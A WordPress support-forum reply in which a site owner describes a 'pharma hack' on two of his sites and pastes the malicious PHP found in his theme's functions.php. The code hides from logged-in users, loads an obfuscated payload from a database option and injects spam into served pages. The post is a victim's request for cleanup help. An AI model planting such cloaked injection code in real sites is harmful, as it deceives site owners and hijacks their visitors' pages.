Reply To: Weird pharma hack

Home Forums Support Forum Weird pharma hack Reply To: Weird pharma hack

#782

Grady Booch
Member

I also am trying to unwind this weird pharma hack, which has infected two of my websites (computingthehumanexperience.com and creationsbyjan.com). In both cases, the hack is infecting the functions.php file of my resident themes.

Your plug in did indeed detect the offending code (which looks like this)
if (!function_exists(“b_call”)) {
function b_call() {
if (!ob_get_level()) ob_start(“b_goes”);
}
function b_goes($p) {
if (!defined(‘wp_m1′)) {
if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists(‘is_user_logged_in’) && is_user_logged_in()) || (!$m = get_option(‘_textalternate2′))) {
return $p;
}
list($m, $n) = @unserialize(trim(strrev($m)));
define(‘wp_m1′, $m);
define(‘wp_n1′, $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace(“~<body[^>]*>~i”, “$0\n”.wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace(“~</head>~”, wp_m1.”\n</head>”, $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace(“~</div>~”, “</div>\n”.wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace(“~</div>~”, wp_m1.”\n</div>”, $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action(“init”, “b_call”);
add_action(“wp_head”, “b_call”);
add_action(“get_sidebar”, “b_call”);
add_action(“wp_footer”, “b_call”);
add_action(“shutdown”, “b_end”);
}

I’m currently throwing all sort of things at the problem. Exploit Scanner uncovered a handful of core wordpress files that should not be there (and I’ve eliminated those) but clearly there’s still something in the database that makes this injected code pop up at random times like a whack-a-mole game. I’ve checked the usual places in the wp-options table (but no joy yet) and i’m about to look through all my plugins for strange code).

As for the database investigation, I should point out that all the usual table item names that have been typically used in pharma attacks are not present….this current  attack appears to be some new variation.

Needless to say, this is annoying :-(

(and thank you, your plugin  helped me  attend to the immediate symptoms….now i just need to find the root of the disease)